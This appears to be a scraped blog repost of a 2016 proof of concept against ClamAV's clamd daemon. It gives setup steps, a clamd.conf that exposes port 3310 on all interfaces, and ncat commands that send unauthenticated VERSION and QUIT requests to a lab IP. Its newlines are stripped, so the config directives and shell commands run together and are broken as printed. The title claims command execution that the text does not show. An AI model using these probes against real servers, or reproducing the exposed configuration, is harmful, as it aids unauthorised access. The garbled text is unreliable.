exploit - ClamAV servers vulnerable to unauthenticated clamav comand execution.

来源：互联网发布：java form表单属性编辑：程序博客网时间：2024/05/21 23:21

ClamAV® is an open source antivirus engine for detecting trojans, viruses, malware & other malicious threats.

Setup Clamav Environment

$ sudo apt-get install clamav clamav-daemon$ sudo freshclam$ sudo clamd --config-file=/etc/clamav/clamd.conf

If you don’t have clamd.conf, please try the demo configuration:

#Automatically Generated by clamav-daemon postinst#To reconfigure clamd run #dpkg-reconfigure clamav-daemon#Please read /usr/share/doc/clamav-daemon/README.Debian.gz for detailsLocalSocket /var/run/clamav/clamd.ctlFixStaleSocket trueLocalSocketGroup clamavLocalSocketMode 666# TCP port address.# Default: noTCPSocket 3310# TCP address.# By default we bind to INADDR_ANY, probably not wise.# Enable the following to provide some degree of protection# from the outside world.# Default: noTCPAddr 0.0.0.0# Maximum length the queue of pending connections may grow to.# Default: 15MaxConnectionQueueLength 30# Clamd uses FTP-like protocol to receive data from remote clients.# If you are using clamav-milter to balance load between remote clamd daemons# on firewall servers you may need to tune the options below.# Close the connection when the data size limit is exceeded.# The value should match your MTA's limit for a maximum attachment size.# Default: 10MStreamMaxLength 55M# Limit port range.# Default: 1024#StreamMinPort 30000# Default: 2048#StreamMaxPort 32000# Maximum number of threads running at the same time.# Default: 10MaxThreads 50# Waiting for data from a client socket will timeout after this time (seconds).# Value of 0 disables the timeout.# Default: 120ReadTimeout 300# Waiting for a new job will timeout after this time (seconds).# Default: 30#IdleTimeout 60# Maximum depth directories are scanned at.# Default: 15#MaxDirectoryRecursion 20# TemporaryDirectory is not set to its default /tmp here to make overriding# the default with environment variables TMPDIR/TMP/TEMP possibleUser clamavScanMail trueScanArchive trueArchiveBlockEncrypted falseMaxDirectoryRecursion 15FollowDirectorySymlinks falseFollowFileSymlinks falseReadTimeout 180MaxThreads 12MaxConnectionQueueLength 15LogSyslog falseLogRotate trueLogFacility LOG_LOCAL6LogClean falseLogVerbose falseDatabaseDirectory /var/lib/clamavOfficialDatabaseOnly falseSelfCheck 3600Foreground falseDebug falseScanPE trueMaxEmbeddedPE 10MScanOLE2 trueScanPDF trueScanHTML trueMaxHTMLNormalize 10MMaxHTMLNoTags 2MMaxScriptNormalize 5MMaxZipTypeRcg 1MScanSWF trueDetectBrokenExecutables falseExitOnOOM falseLeaveTemporaryFiles falseAlgorithmicDetection trueScanELF trueIdleTimeout 30CrossFilesystems truePhishingSignatures truePhishingScanURLs truePhishingAlwaysBlockSSLMismatch falsePhishingAlwaysBlockCloak falsePartitionIntersection falseDetectPUA falseScanPartialMessages falseHeuristicScanPrecedence falseStructuredDataDetection falseCommandReadTimeout 5SendBufTimeout 200MaxQueue 100ExtendedDetectionInfo trueOLE2BlockMacros falseScanOnAccess falseAllowAllMatchScan trueForceToDisk falseDisableCertCheck falseDisableCache falseMaxScanSize 100MMaxFileSize 25MMaxRecursion 16MaxFiles 10000MaxPartitions 50MaxIconsPE 100PCREMatchLimit 10000PCRERecMatchLimit 5000PCREMaxFileSize 25MScanXMLDOCS trueScanHWP3 trueMaxRecHWP3 16StatsEnabled falseStatsPEDisabled trueStatsHostID autoStatsTimeout 10StreamMaxLength 25MLogFile /var/log/clamav/clamav.logLogTime trueLogFileUnlock falseLogFileMaxSize 0Bytecode trueBytecodeSecurity TrustSignedBytecodeTimeout 60000

Exploit

$ python -c 'print "VERSION\n"' | ncat 172.16.176.129 3310ClamAV 0.99.2/21726/Mon Jun 13 21:54:30 2016$ python -c 'print "QUIT\n"' | ncat 172.16.176.129 3310

More clamd Usage, please read manual:

$ man clamd

References

http://seclists.org/nmap-dev/2016/q2/201
https://www.clamav.net/documents/installing-clamav
https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf

0 0